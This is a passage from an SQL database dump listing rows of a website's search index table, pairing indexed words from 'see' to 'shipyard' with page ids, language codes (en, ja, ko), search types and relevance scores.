('see', 34, 'ja', 'help_search', 1),
('see', 34, 'ko', 'help_search', 1),
('see', 35, 'en', 'help_search', 1.98087),
('see', 35, 'ja', 'help_search', 1.98087),
('see', 35, 'ko', 'help_search', 1.98087),
('see', 36, 'en', 'help_search', 1),
('see', 36, 'ja', 'help_search', 1),
('see', 36, 'ko', 'help_search', 1),
('see', 38, 'en', 'help_search', 1),
('see', 38, 'ja', 'help_search', 1),
('see', 38, 'ko', 'help_search', 1),
('see', 40, 'en', 'help_search', 1),
('see', 40, 'ja', 'help_search', 1),
('see', 40, 'ko', 'help_search', 1),
('see', 41, 'en', 'help_search', 3),
('see', 41, 'ja', 'help_search', 3),
('see', 41, 'ko', 'help_search', 3),
('see', 43, 'en', 'help_search', 2.86679),
('see', 43, 'ja', 'help_search', 2.86679),
('see', 43, 'ko', 'help_search', 2.86679),
('see', 44, 'en', 'help_search', 1),
('see', 44, 'ja', 'help_search', 1),
('see', 44, 'ko', 'help_search', 1),
('see', 45, 'en', 'help_search', 1),
('see', 45, 'ja', 'help_search', 1),
('see', 45, 'ko', 'help_search', 1),
('see', 46, 'en', 'help_search', 0.957226),
('see', 46, 'ja', 'help_search', 0.957226),
('see', 46, 'ko', 'help_search', 0.957226),
('see', 48, 'en', 'help_search', 2),
('see', 48, 'ja', 'help_search', 2),
('see', 48, 'ko', 'help_search', 2),
('see', 53, 'en', 'help_search', 1),
('see', 53, 'ja', 'help_search', 1),
('see', 53, 'ko', 'help_search', 1),
('see', 54, 'en', 'help_search', 3),
('see', 54, 'ja', 'help_search', 3),
('see', 54, 'ko', 'help_search', 3),
('see', 57, 'en', 'help_search', 1),
('see', 57, 'ja', 'help_search', 1),
('see', 57, 'ko', 'help_search', 1),
('see', 59, 'en', 'help_search', 2),
('see', 59, 'ja', 'help_search', 2),
('see', 59, 'ko', 'help_search', 2),
('see', 60, 'en', 'help_search', 1),
('see', 60, 'ja', 'help_search', 1),
('see', 60, 'ko', 'help_search', 1),
('see', 61, 'en', 'help_search', 1),
('see', 61, 'ja', 'help_search', 1),
('see', 61, 'ko', 'help_search', 1),
('see', 62, 'en', 'help_search', 2),
('see', 62, 'ja', 'help_search', 2),
('see', 62, 'ko', 'help_search', 2),
('see', 63, 'en', 'help_search', 2),
('see', 63, 'ja', 'help_search', 2),
('see', 63, 'ko', 'help_search', 2),
('see', 64, 'en', 'help_search', 1),
('see', 64, 'ja', 'help_search', 1),
('see', 64, 'ko', 'help_search', 1),
('see', 65, 'en', 'help_search', 2),
('see', 65, 'ja', 'help_search', 2),
('see', 65, 'ko', 'help_search', 2),
('see', 66, 'en', 'help_search', 1),
('see', 66, 'ja', 'help_search', 1),
('see', 67, 'en', 'help_search', 1),
('see', 67, 'ja', 'help_search', 1),
('see', 67, 'ko', 'help_search', 1),
('see', 68, 'en', 'help_search', 3.64573),
('see', 68, 'ja', 'help_search', 3.64573),
('see', 68, 'ko', 'help_search', 3.64573),
('see', 70, 'en', 'help_search', 1),
('see', 70, 'ja', 'help_search', 1),
('see', 70, 'ko', 'help_search', 1),
('see', 71, 'en', 'help_search', 3),
('see', 71, 'ja', 'help_search', 3),
('see', 71, 'ko', 'help_search', 3),
('see', 72, 'en', 'help_search', 1.85668),
('see', 72, 'ja', 'help_search', 1.85668),
('see', 72, 'ko', 'help_search', 1.85668),
('see', 73, 'en', 'help_search', 2),
('see', 73, 'ja', 'help_search', 2),
('see', 73, 'ko', 'help_search', 2),
('see', 74, 'en', 'help_search', 1),
('see', 74, 'ja', 'help_search', 1),
('see', 74, 'ko', 'help_search', 1),
('see', 75, 'en', 'help_search', 2),
('see', 75, 'ja', 'help_search', 2),
('see', 75, 'ko', 'help_search', 2),
('see', 76, 'en', 'help_search', 4),
('see', 76, 'ja', 'help_search', 4),
('see', 76, 'ko', 'help_search', 4),
('see', 79, 'en', 'help_search', 3),
('see', 79, 'ja', 'help_search', 3),
('see', 79, 'ko', 'help_search', 3),
('see', 80, 'en', 'help_search', 1.91323),
('see', 80, 'ja', 'help_search', 1.91323),
('see', 80, 'ko', 'help_search', 1.91323),
('see', 86, 'en', 'help_search', 0.961087),
('see', 86, 'ja', 'help_search', 0.961087),
('see', 86, 'ko', 'help_search', 0.961087),
('see', 89, 'en', 'help_search', 2),
('see', 89, 'ja', 'help_search', 2),
('see', 89, 'ko', 'help_search', 2),
('see', 91, 'en', 'help_search', 1),
('see', 91, 'ja', 'help_search', 1),
('see', 91, 'ko', 'help_search', 1),
('see', 92, 'en', 'help_search', 1),
('see', 92, 'ja', 'help_search', 1),
('see', 92, 'ko', 'help_search', 1),
('see', 93, 'en', 'help_search', 2.58117),
('see', 93, 'ja', 'help_search', 2.58117),
('see', 93, 'ko', 'help_search', 2.58117),
('seeing', 140, 'en', 'node_search', 1),
('seeing', 166, 'en', 'node_search', 1),
('seeing', 178, 'en', 'node_search', 1),
('seeing', 182, 'en', 'node_search', 1),
('seeing', 187, 'en', 'node_search', 1),
('seeing', 194, 'en', 'node_search', 1),
('seeing', 197, 'en', 'node_search', 1),
('seek', 142, 'en', 'node_search', 1),
('seeking', 135, 'en', 'node_search', 1),
('seeking', 162, 'en', 'node_search', 1),
('seeking', 185, 'en', 'node_search', 1),
('seen', 40, 'en', 'help_search', 1),
('seen', 40, 'ja', 'help_search', 1),
('seen', 40, 'ko', 'help_search', 1),
('seize', 62, 'en', 'node_search', 29),
('seize', 66, 'en', 'node_search', 1),
('select', 8, 'en', 'help_search', 1),
('select', 8, 'ja', 'help_search', 1),
('select', 8, 'ko', 'help_search', 1),
('select', 9, 'en', 'help_search', 1),
('select', 9, 'ja', 'help_search', 1),
('select', 9, 'ko', 'help_search', 1),
('select', 10, 'en', 'help_search', 7),
('select', 10, 'ja', 'help_search', 7),
('select', 10, 'ko', 'help_search', 7),
('select', 13, 'en', 'help_search', 2),
('select', 13, 'ja', 'help_search', 2),
('select', 13, 'ko', 'help_search', 2),
('select', 15, 'en', 'help_search', 1),
('select', 15, 'ja', 'help_search', 1),
('select', 15, 'ko', 'help_search', 1),
('select', 23, 'en', 'help_search', 0.972861),
('select', 23, 'ja', 'help_search', 0.972861),
('select', 23, 'ko', 'help_search', 0.972861),
('select', 24, 'en', 'help_search', 1),
('select', 24, 'ja', 'help_search', 1),
('select', 24, 'ko', 'help_search', 1),
('select', 25, 'en', 'help_search', 2),
('select', 25, 'ja', 'help_search', 2),
('select', 26, 'en', 'help_search', 1),
('select', 26, 'en', 'node_search', 1),
('select', 26, 'ja', 'help_search', 1),
('select', 26, 'ko', 'help_search', 1),
('select', 27, 'en', 'help_search', 3),
('select', 27, 'ja', 'help_search', 3),
('select', 27, 'ko', 'help_search', 3),
('select', 32, 'en', 'help_search', 0.997306),
('select', 32, 'ja', 'help_search', 0.997306),
('select', 32, 'ko', 'help_search', 0.997306),
('select', 49, 'en', 'help_search', 2),
('select', 49, 'ja', 'help_search', 2),
('select', 49, 'ko', 'help_search', 2),
('select', 51, 'en', 'help_search', 1),
('select', 51, 'ja', 'help_search', 1),
('select', 51, 'ko', 'help_search', 1),
('select', 52, 'en', 'help_search', 1),
('select', 52, 'ja', 'help_search', 1),
('select', 52, 'ko', 'help_search', 1),
('select', 54, 'en', 'help_search', 4),
('select', 54, 'ja', 'help_search', 4),
('select', 54, 'ko', 'help_search', 4),
('select', 55, 'en', 'help_search', 1),
('select', 55, 'ja', 'help_search', 1),
('select', 55, 'ko', 'help_search', 1),
('select', 56, 'en', 'help_search', 2),
('select', 56, 'ja', 'help_search', 2),
('select', 56, 'ko', 'help_search', 2),
('select', 61, 'en', 'help_search', 2.99315),
('select', 61, 'ja', 'help_search', 2.99315),
('select', 61, 'ko', 'help_search', 2.99315),
('select', 66, 'en', 'help_search', 2),
('select', 66, 'ja', 'help_search', 2),
('select', 67, 'en', 'help_search', 1),
('select', 67, 'ja', 'help_search', 1),
('select', 67, 'ko', 'help_search', 1),
('select', 69, 'en', 'help_search', 6),
('select', 69, 'ja', 'help_search', 6),
('select', 69, 'ko', 'help_search', 6),
('select', 71, 'en', 'help_search', 1),
('select', 71, 'ja', 'help_search', 1),
('select', 71, 'ko', 'help_search', 1),
('select', 72, 'en', 'help_search', 1.84417),
('select', 72, 'ja', 'help_search', 1.84417),
('select', 72, 'ko', 'help_search', 1.84417),
('select', 77, 'en', 'help_search', 1),
('select', 77, 'ja', 'help_search', 1),
('select', 77, 'ko', 'help_search', 1),
('select', 80, 'en', 'help_search', 1),
('select', 80, 'ja', 'help_search', 1),
('select', 80, 'ko', 'help_search', 1),
('select', 86, 'en', 'help_search', 1.99731),
('select', 86, 'ja', 'help_search', 1.99731),
('select', 86, 'ko', 'help_search', 1.99731),
('select', 87, 'en', 'help_search', 1),
('select', 87, 'ja', 'help_search', 1),
('select', 87, 'ko', 'help_search', 1),
('select', 90, 'en', 'help_search', 2),
('select', 90, 'ja', 'help_search', 2),
('select', 90, 'ko', 'help_search', 2),
('select', 92, 'en', 'help_search', 1),
('select', 92, 'ja', 'help_search', 1),
('select', 92, 'ko', 'help_search', 1),
('select', 93, 'en', 'help_search', 0.851346),
('select', 93, 'ja', 'help_search', 0.851346),
('select', 93, 'ko', 'help_search', 0.851346),
('selected', 7, 'en', 'help_search', 0.989021),
('selected', 7, 'ja', 'help_search', 0.989021),
('selected', 7, 'ko', 'help_search', 0.989021),
('selected', 10, 'en', 'help_search', 8),
('selected', 10, 'ja', 'help_search', 8),
('selected', 10, 'ko', 'help_search', 8),
('selected', 23, 'en', 'help_search', 0.953396),
('selected', 23, 'ja', 'help_search', 0.953396),
('selected', 23, 'ko', 'help_search', 0.953396),
('selected', 50, 'en', 'help_search', 2),
('selected', 50, 'ja', 'help_search', 2),
('selected', 50, 'ko', 'help_search', 2),
('selected', 61, 'en', 'help_search', 3.97258),
('selected', 61, 'ja', 'help_search', 3.97258),
('selected', 61, 'ko', 'help_search', 3.97258),
('selected', 77, 'en', 'help_search', 1),
('selected', 77, 'ja', 'help_search', 1),
('selected', 77, 'ko', 'help_search', 1),
('selected', 89, 'en', 'help_search', 4),
('selected', 89, 'ja', 'help_search', 4),
('selected', 89, 'ko', 'help_search', 4),
('selecting', 25, 'ja', 'help_search', 1),
('selecting', 26, 'en', 'help_search', 1),
('selecting', 26, 'ja', 'help_search', 1),
('selecting', 26, 'ko', 'help_search', 1),
('selection', 50, 'en', 'help_search', 27),
('selection', 50, 'ja', 'help_search', 27),
('selection', 50, 'ko', 'help_search', 27),
('selector', 92, 'en', 'help_search', 4),
('selector', 92, 'ja', 'help_search', 4),
('selector', 92, 'ko', 'help_search', 4),
('selects', 23, 'en', 'help_search', 1),
('selects', 23, 'ja', 'help_search', 1),
('selects', 23, 'ko', 'help_search', 1),
('selfimprovement', 195, 'en', 'node_search', 1),
('selling', 23, 'en', 'node_search', 1),
('semiprofessionals', 7, 'en', 'node_search', 2),
('semiprofessionals', 7, 'ko', 'node_search', 4),
('send', 23, 'en', 'node_search', 0.76188),
('send', 37, 'en', 'help_search', 0.98493),
('send', 37, 'ja', 'help_search', 0.98493),
('send', 37, 'ko', 'help_search', 0.98493),
('send', 69, 'en', 'node_search', 1),
('sending', 44, 'en', 'help_search', 1),
('sending', 44, 'ja', 'help_search', 1),
('sending', 44, 'ko', 'help_search', 1),
('sends', 72, 'en', 'help_search', 1),
('sends', 72, 'ja', 'help_search', 1),
('sends', 72, 'ko', 'help_search', 1),
('seniors', 87, 'en', 'node_search', 1),
('sensei', 62, 'en', 'node_search', 2),
('sent', 37, 'en', 'help_search', 1.86581),
('sent', 37, 'ja', 'help_search', 1.86581),
('sent', 37, 'ko', 'help_search', 1.86581),
('sent', 86, 'en', 'help_search', 1),
('sent', 86, 'ja', 'help_search', 1),
('sent', 86, 'ko', 'help_search', 1),
('seofriendly', 63, 'en', 'help_search', 1),
('seofriendly', 63, 'ja', 'help_search', 1),
('seofriendly', 63, 'ko', 'help_search', 1),
('separate', 6, 'en', 'help_search', 1),
('separate', 6, 'ja', 'help_search', 1),
('separate', 6, 'ko', 'help_search', 1),
('separately', 29, 'en', 'help_search', 1),
('separately', 29, 'ja', 'help_search', 1),
('separately', 29, 'ko', 'help_search', 1),
('separately', 33, 'en', 'help_search', 1),
('separately', 33, 'ja', 'help_search', 1),
('separately', 33, 'ko', 'help_search', 1),
('separates', 6, 'en', 'help_search', 1),
('separates', 6, 'ja', 'help_search', 1),
('separates', 6, 'ko', 'help_search', 1),
('september', 62, 'en', 'node_search', 30.867),
('september', 69, 'en', 'node_search', 1),
('sequence', 28, 'en', 'help_search', 1),
('sequence', 28, 'ja', 'help_search', 1),
('sequence', 28, 'ko', 'help_search', 1),
('serialization', 30, 'en', 'help_search', 0.98493),
('serialization', 30, 'ja', 'help_search', 0.98493),
('serialization', 30, 'ko', 'help_search', 0.98493),
('serialization', 44, 'en', 'help_search', 24),
('serialization', 44, 'ja', 'help_search', 24),
('serialization', 44, 'ko', 'help_search', 24),
('serialized', 44, 'en', 'help_search', 1),
('serialized', 44, 'ja', 'help_search', 1),
('serialized', 44, 'ko', 'help_search', 1),
('series', 50, 'en', 'help_search', 1),
('series', 50, 'ja', 'help_search', 1),
('series', 50, 'ko', 'help_search', 1),
('serve', 35, 'en', 'help_search', 0.98493),
('serve', 35, 'ja', 'help_search', 0.98493),
('serve', 35, 'ko', 'help_search', 0.98493),
('serve', 168, 'en', 'node_search', 1),
('serve', 169, 'en', 'node_search', 1),
('serve', 170, 'en', 'node_search', 1),
('server', 32, 'en', 'help_search', 2),
('server', 32, 'ja', 'help_search', 2),
('server', 32, 'ko', 'help_search', 2),
('server', 72, 'en', 'help_search', 1),
('server', 72, 'ja', 'help_search', 1),
('server', 72, 'ko', 'help_search', 1),
('servers', 32, 'en', 'help_search', 1),
('servers', 32, 'ja', 'help_search', 1),
('servers', 32, 'ko', 'help_search', 1),
('service', 7, 'en', 'node_search', 2),
('service', 7, 'ko', 'node_search', 4),
('service', 23, 'en', 'node_search', 1),
('service', 24, 'en', 'node_search', 1),
('service', 44, 'en', 'help_search', 20),
('service', 44, 'ja', 'help_search', 20),
('service', 44, 'ko', 'help_search', 20),
('service', 68, 'en', 'node_search', 2),
('service', 68, 'ja', 'node_search', 1),
('service', 156, 'en', 'node_search', 28),
('service', 157, 'en', 'node_search', 28),
('service', 160, 'en', 'node_search', 32),
('service', 161, 'en', 'node_search', 33),
('service', 167, 'en', 'node_search', 30),
('service', 173, 'en', 'node_search', 30),
('service', 174, 'en', 'node_search', 30),
('service', 175, 'en', 'node_search', 30),
('service', 176, 'en', 'node_search', 30),
('service', 177, 'en', 'node_search', 30),
('service', 179, 'en', 'node_search', 30),
('service', 180, 'en', 'node_search', 29),
('service', 184, 'en', 'node_search', 30),
('service', 185, 'en', 'node_search', 30),
('service', 186, 'en', 'node_search', 30),
('service', 187, 'en', 'node_search', 7),
('service', 190, 'en', 'node_search', 6),
('service', 191, 'en', 'node_search', 5),
('service', 192, 'en', 'node_search', 3),
('service', 193, 'en', 'node_search', 6),
('service', 194, 'en', 'node_search', 6),
('service', 195, 'en', 'node_search', 3),
('service', 196, 'en', 'node_search', 6),
('service', 197, 'en', 'node_search', 6),
('service', 198, 'en', 'node_search', 3),
('service', 199, 'en', 'node_search', 6),
('services', 1, 'en', 'node_search', 1),
('services', 23, 'en', 'node_search', 1.76922),
('services', 24, 'en', 'node_search', 32.6267),
('services', 27, 'en', 'node_search', 5.17183),
('services', 44, 'en', 'help_search', 72),
('services', 44, 'ja', 'help_search', 72),
('services', 44, 'ko', 'help_search', 72),
('services', 170, 'en', 'node_search', 1),
('serving', 35, 'en', 'help_search', 1),
('serving', 35, 'ja', 'help_search', 1),
('serving', 35, 'ko', 'help_search', 1),
('session', 31, 'ja', 'help_search', 4),
('session', 50, 'en', 'help_search', 2),
('session', 50, 'ja', 'help_search', 2),
('session', 50, 'ko', 'help_search', 2),
('sessions', 67, 'ja', 'node_search', 1),
('sessions', 142, 'en', 'node_search', 1),
('set', 7, 'en', 'help_search', 0.916736),
('set', 7, 'ja', 'help_search', 0.916736),
('set', 7, 'ko', 'help_search', 0.916736),
('set', 8, 'en', 'help_search', 1),
('set', 8, 'ja', 'help_search', 1),
('set', 8, 'ko', 'help_search', 1),
('set', 11, 'en', 'help_search', 2),
('set', 11, 'ja', 'help_search', 2),
('set', 11, 'ko', 'help_search', 2),
('set', 21, 'en', 'help_search', 1),
('set', 21, 'ja', 'help_search', 1),
('set', 21, 'ko', 'help_search', 1),
('set', 24, 'en', 'help_search', 2),
('set', 24, 'ja', 'help_search', 2),
('set', 24, 'ko', 'help_search', 2),
('set', 27, 'en', 'help_search', 2),
('set', 27, 'ja', 'help_search', 2),
('set', 27, 'ko', 'help_search', 2),
('set', 28, 'en', 'help_search', 0.866793),
('set', 28, 'ja', 'help_search', 0.866793),
('set', 28, 'ko', 'help_search', 0.866793),
('set', 29, 'en', 'help_search', 1),
('set', 29, 'ja', 'help_search', 1),
('set', 29, 'ko', 'help_search', 1),
('set', 30, 'en', 'help_search', 2.3646),
('set', 30, 'ja', 'help_search', 2.3646),
('set', 30, 'ko', 'help_search', 2.3646),
('set', 32, 'en', 'help_search', 2),
('set', 32, 'ja', 'help_search', 2),
('set', 32, 'ko', 'help_search', 2),
('set', 33, 'en', 'help_search', 2),
('set', 33, 'ja', 'help_search', 2),
('set', 33, 'ko', 'help_search', 2),
('set', 35, 'en', 'help_search', 1),
('set', 35, 'ja', 'help_search', 1),
('set', 35, 'ko', 'help_search', 1),
('set', 43, 'en', 'help_search', 0.98493),
('set', 43, 'ja', 'help_search', 0.98493),
('set', 43, 'ko', 'help_search', 0.98493),
('set', 45, 'en', 'help_search', 1),
('set', 45, 'ja', 'help_search', 1),
('set', 45, 'ko', 'help_search', 1),
('set', 50, 'en', 'help_search', 1),
('set', 50, 'ja', 'help_search', 1),
('set', 50, 'ko', 'help_search', 1),
('set', 52, 'en', 'help_search', 1),
('set', 52, 'ja', 'help_search', 1),
('set', 52, 'ko', 'help_search', 1),
('set', 60, 'en', 'help_search', 1),
('set', 60, 'ja', 'help_search', 1),
('set', 60, 'ko', 'help_search', 1),
('set', 62, 'en', 'help_search', 1),
('set', 62, 'ja', 'help_search', 1),
('set', 62, 'ko', 'help_search', 1),
('set', 65, 'en', 'help_search', 1),
('set', 65, 'ja', 'help_search', 1),
('set', 65, 'ko', 'help_search', 1),
('set', 66, 'en', 'help_search', 4),
('set', 66, 'ja', 'help_search', 4),
('set', 69, 'en', 'help_search', 20),
('set', 69, 'ja', 'help_search', 20),
('set', 69, 'ko', 'help_search', 20),
('set', 72, 'en', 'help_search', 1),
('set', 72, 'ja', 'help_search', 1),
('set', 72, 'ko', 'help_search', 1),
('set', 77, 'en', 'help_search', 4),
('set', 77, 'ja', 'help_search', 4),
('set', 77, 'ko', 'help_search', 4),
('set', 80, 'en', 'help_search', 5.98087),
('set', 80, 'ja', 'help_search', 5.98087),
('set', 80, 'ko', 'help_search', 5.98087),
('set', 130, 'en', 'node_search', 1),
('set', 130, 'ja', 'node_search', 1),
('set', 153, 'en', 'node_search', 1),
('set', 153, 'ja', 'node_search', 1),
('set', 176, 'en', 'node_search', 27),
('sets', 69, 'en', 'help_search', 5),
('sets', 69, 'ja', 'help_search', 5),
('sets', 69, 'ko', 'help_search', 5),
('setting', 9, 'en', 'help_search', 1),
('setting', 9, 'ja', 'help_search', 1),
('setting', 9, 'ko', 'help_search', 1),
('setting', 20, 'en', 'help_search', 1),
('setting', 20, 'ja', 'help_search', 1),
('setting', 20, 'ko', 'help_search', 1),
('setting', 21, 'en', 'help_search', 26),
('setting', 21, 'ja', 'help_search', 26),
('setting', 21, 'ko', 'help_search', 26),
('setting', 37, 'en', 'help_search', 0.863659),
('setting', 37, 'ja', 'help_search', 0.863659),
('setting', 37, 'ko', 'help_search', 0.863659),
('setting', 60, 'en', 'help_search', 11),
('setting', 60, 'ja', 'help_search', 11),
('setting', 60, 'ko', 'help_search', 11),
('setting', 77, 'en', 'help_search', 26),
('setting', 77, 'ja', 'help_search', 26),
('setting', 77, 'ko', 'help_search', 26),
('setting', 79, 'en', 'help_search', 11),
('setting', 79, 'ja', 'help_search', 11),
('setting', 79, 'ko', 'help_search', 11),
('setting', 91, 'en', 'help_search', 1),
('setting', 91, 'ja', 'help_search', 1),
('setting', 91, 'ko', 'help_search', 1),
('setting', 93, 'en', 'help_search', 1),
('setting', 93, 'ja', 'help_search', 1),
('setting', 93, 'ko', 'help_search', 1),
('settings', 1, 'en', 'help_search', 4),
('settings', 1, 'ja', 'help_search', 4),
('settings', 1, 'ko', 'help_search', 4),
('settings', 2, 'en', 'help_search', 1),
('settings', 2, 'ja', 'help_search', 1),
('settings', 2, 'ko', 'help_search', 1),
('settings', 7, 'en', 'help_search', 20.4185),
('settings', 7, 'ja', 'help_search', 20.4185),
('settings', 7, 'ko', 'help_search', 20.4185),
('settings', 8, 'en', 'help_search', 4),
('settings', 8, 'ja', 'help_search', 4),
('settings', 8, 'ko', 'help_search', 4),
('settings', 9, 'en', 'help_search', 9),
('settings', 9, 'ja', 'help_search', 9),
('settings', 9, 'ko', 'help_search', 9),
('settings', 10, 'en', 'help_search', 4),
('settings', 10, 'ja', 'help_search', 4),
('settings', 10, 'ko', 'help_search', 4),
('settings', 11, 'en', 'help_search', 1),
('settings', 11, 'ja', 'help_search', 1),
('settings', 11, 'ko', 'help_search', 1),
('settings', 18, 'en', 'help_search', 8),
('settings', 18, 'ja', 'help_search', 8),
('settings', 18, 'ko', 'help_search', 8),
('settings', 19, 'en', 'help_search', 1),
('settings', 19, 'ja', 'help_search', 1),
('settings', 19, 'ko', 'help_search', 1),
('settings', 22, 'en', 'help_search', 0.972861),
('settings', 22, 'ja', 'help_search', 0.972861),
('settings', 22, 'ko', 'help_search', 0.972861),
('settings', 23, 'en', 'help_search', 3.42983),
('settings', 23, 'ja', 'help_search', 3.42983),
('settings', 23, 'ko', 'help_search', 3.42983),
('settings', 24, 'en', 'help_search', 9),
('settings', 24, 'ja', 'help_search', 9),
('settings', 24, 'ko', 'help_search', 9),
('settings', 25, 'en', 'help_search', 3),
('settings', 25, 'ja', 'help_search', 3),
('settings', 26, 'en', 'help_search', 3),
('settings', 26, 'ja', 'help_search', 3),
('settings', 26, 'ko', 'help_search', 3),
('settings', 27, 'en', 'help_search', 9),
('settings', 27, 'ja', 'help_search', 9),
('settings', 27, 'ko', 'help_search', 9),
('settings', 28, 'en', 'help_search', 3.99239),
('settings', 28, 'ja', 'help_search', 3.99239),
('settings', 28, 'ko', 'help_search', 3.99239),
('settings', 30, 'en', 'help_search', 6.6956),
('settings', 30, 'ja', 'help_search', 6.6956),
('settings', 30, 'ko', 'help_search', 6.6956),
('settings', 32, 'en', 'help_search', 3.95608),
('settings', 32, 'ja', 'help_search', 3.95608),
('settings', 32, 'ko', 'help_search', 3.95608),
('settings', 37, 'en', 'help_search', 0.892724),
('settings', 37, 'ja', 'help_search', 0.892724),
('settings', 37, 'ko', 'help_search', 0.892724),
('settings', 39, 'en', 'help_search', 54),
('settings', 39, 'ja', 'help_search', 54),
('settings', 39, 'ko', 'help_search', 54),
('settings', 41, 'en', 'help_search', 1),
('settings', 41, 'ja', 'help_search', 1),
('settings', 41, 'ko', 'help_search', 1),
('settings', 43, 'en', 'help_search', 2.92743),
('settings', 43, 'ja', 'help_search', 2.92743),
('settings', 43, 'ko', 'help_search', 2.92743),
('settings', 50, 'en', 'help_search', 3.9235),
('settings', 50, 'ja', 'help_search', 3.9235),
('settings', 50, 'ko', 'help_search', 3.9235),
('settings', 55, 'en', 'help_search', 30),
('settings', 55, 'ja', 'help_search', 30),
('settings', 55, 'ko', 'help_search', 30),
('settings', 56, 'en', 'help_search', 1),
('settings', 56, 'ja', 'help_search', 1),
('settings', 56, 'ko', 'help_search', 1),
('settings', 60, 'en', 'help_search', 1),
('settings', 60, 'ja', 'help_search', 1),
('settings', 60, 'ko', 'help_search', 1),
('settings', 62, 'en', 'help_search', 1),
('settings', 62, 'ja', 'help_search', 1),
('settings', 62, 'ko', 'help_search', 1),
('settings', 67, 'en', 'help_search', 7.93972),
('settings', 67, 'ja', 'help_search', 7.93972),
('settings', 67, 'ko', 'help_search', 7.93972),
('settings', 71, 'en', 'help_search', 37),
('settings', 71, 'ja', 'help_search', 37),
('settings', 71, 'ko', 'help_search', 37),
('settings', 72, 'en', 'help_search', 5.84528),
('settings', 72, 'ja', 'help_search', 5.84528),
('settings', 72, 'ko', 'help_search', 5.84528),
('settings', 79, 'en', 'help_search', 1),
('settings', 79, 'ja', 'help_search', 1),
('settings', 79, 'ko', 'help_search', 1),
('settings', 82, 'en', 'help_search', 1),
('settings', 82, 'ja', 'help_search', 1),
('settings', 82, 'ko', 'help_search', 1),
('settings', 84, 'en', 'help_search', 1),
('settings', 84, 'ja', 'help_search', 1),
('settings', 84, 'ko', 'help_search', 1),
('settings', 86, 'en', 'help_search', 26.9276),
('settings', 86, 'ja', 'help_search', 26.9276),
('settings', 86, 'ko', 'help_search', 26.9276),
('settings', 88, 'en', 'help_search', 2),
('settings', 88, 'ja', 'help_search', 2),
('settings', 88, 'ko', 'help_search', 2),
('settings', 89, 'en', 'help_search', 2),
('settings', 89, 'ja', 'help_search', 2),
('settings', 89, 'ko', 'help_search', 2),
('settings', 90, 'en', 'help_search', 5),
('settings', 90, 'ja', 'help_search', 5),
('settings', 90, 'ko', 'help_search', 5),
('settings', 91, 'en', 'help_search', 14),
('settings', 91, 'ja', 'help_search', 14),
('settings', 91, 'ko', 'help_search', 14),
('settings', 92, 'en', 'help_search', 34),
('settings', 92, 'ja', 'help_search', 34),
('settings', 92, 'ko', 'help_search', 34),
('settings', 93, 'en', 'help_search', 10),
('settings', 93, 'ja', 'help_search', 10),
('settings', 93, 'ko', 'help_search', 10),
('settings', 135, 'en', 'node_search', 1),
('settingsphp', 30, 'en', 'help_search', 5.90181),
('settingsphp', 30, 'ja', 'help_search', 5.90181),
('settingsphp', 30, 'ko', 'help_search', 5.90181),
('several', 29, 'en', 'help_search', 1),
('several', 29, 'ja', 'help_search', 1),
('several', 29, 'ko', 'help_search', 1),
('several', 30, 'en', 'help_search', 0.96498),
('several', 30, 'ja', 'help_search', 0.96498),
('several', 30, 'ko', 'help_search', 0.96498),
('several', 34, 'en', 'help_search', 1),
('several', 34, 'ja', 'help_search', 1),
('several', 34, 'ko', 'help_search', 1),
('several', 61, 'en', 'help_search', 1),
('several', 61, 'ja', 'help_search', 1),
('several', 61, 'ko', 'help_search', 1),
('several', 67, 'en', 'help_search', 1.89945),
('several', 67, 'ja', 'help_search', 1.89945),
('several', 67, 'ko', 'help_search', 1.89945);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('severity', 76, 'en', 'help_search', 4),
('severity', 76, 'ja', 'help_search', 4),
('severity', 76, 'ko', 'help_search', 4),
('sfdsdf', 206, 'ja', 'node_search', 1),
('shan', 73, 'en', 'node_search', 1),
('shan', 73, 'ja', 'node_search', 1),
('shan', 97, 'en', 'node_search', 2),
('shan', 97, 'ja', 'node_search', 2),
('shan', 111, 'en', 'node_search', 2),
('shan', 111, 'ja', 'node_search', 2),
('shar', 103, 'en', 'node_search', 2),
('shar', 103, 'ja', 'node_search', 2),
('shar', 141, 'en', 'node_search', 28),
('shar', 141, 'ja', 'node_search', 28),
('share', 30, 'en', 'help_search', 0.839384),
('share', 30, 'ja', 'help_search', 0.839384),
('share', 30, 'ko', 'help_search', 0.839384),
('share', 179, 'en', 'node_search', 1),
('share', 191, 'en', 'node_search', 1),
('shared', 69, 'en', 'help_search', 2),
('shared', 69, 'ja', 'help_search', 2),
('shared', 69, 'ko', 'help_search', 2),
('sharpen', 62, 'en', 'node_search', 1),
('she', 156, 'en', 'node_search', 3),
('she', 164, 'en', 'node_search', 2),
('she', 171, 'en', 'node_search', 2),
('she', 174, 'en', 'node_search', 2),
('she', 175, 'en', 'node_search', 3),
('she', 177, 'en', 'node_search', 2),
('she', 178, 'en', 'node_search', 1),
('she', 181, 'en', 'node_search', 1),
('she', 183, 'en', 'node_search', 1),
('she', 185, 'en', 'node_search', 2),
('she', 187, 'en', 'node_search', 1),
('she', 188, 'en', 'node_search', 2),
('she', 189, 'en', 'node_search', 2),
('she', 190, 'en', 'node_search', 1),
('she', 191, 'en', 'node_search', 2),
('she', 192, 'en', 'node_search', 1),
('she', 193, 'en', 'node_search', 2),
('she', 194, 'en', 'node_search', 1),
('she', 195, 'en', 'node_search', 2),
('she', 196, 'en', 'node_search', 1),
('she', 197, 'en', 'node_search', 1),
('she', 199, 'en', 'node_search', 2),
('sheets', 204, 'en', 'node_search', 4),
('sheets', 204, 'ja', 'node_search', 4),
('shield', 38, 'en', 'help_search', 1),
('shield', 38, 'ja', 'help_search', 1),
('shield', 38, 'ko', 'help_search', 1),
('shift', 6, 'en', 'help_search', 1),
('shift', 6, 'ja', 'help_search', 1),
('shift', 6, 'ko', 'help_search', 1),
('shiftbased', 162, 'en', 'node_search', 0.934703),
('shin', 79, 'en', 'node_search', 1),
('shin', 80, 'en', 'node_search', 5),
('shin', 80, 'ja', 'node_search', 4.99731),
('shin', 92, 'en', 'node_search', 2),
('shin', 92, 'ja', 'node_search', 2),
('shin', 93, 'en', 'node_search', 27),
('shin', 173, 'en', 'node_search', 1),
('shin', 173, 'ja', 'node_search', 1),
('shinkensen', 62, 'en', 'node_search', 2.6226),
('shipyard', 4, 'en', 'node_search', 1),
('shipyard', 4, 'ja', 'node_search', 1),
('shipyard', 6, 'en', 'node_search', 28),
('shipyard', 8, 'en', 'node_search', 27),
('shipyard', 9, 'en', 'node_search', 3),
('shipyard', 17, 'en', 'node_search', 4),
('shipyard', 23, 'en', 'node_search', 0.961087),
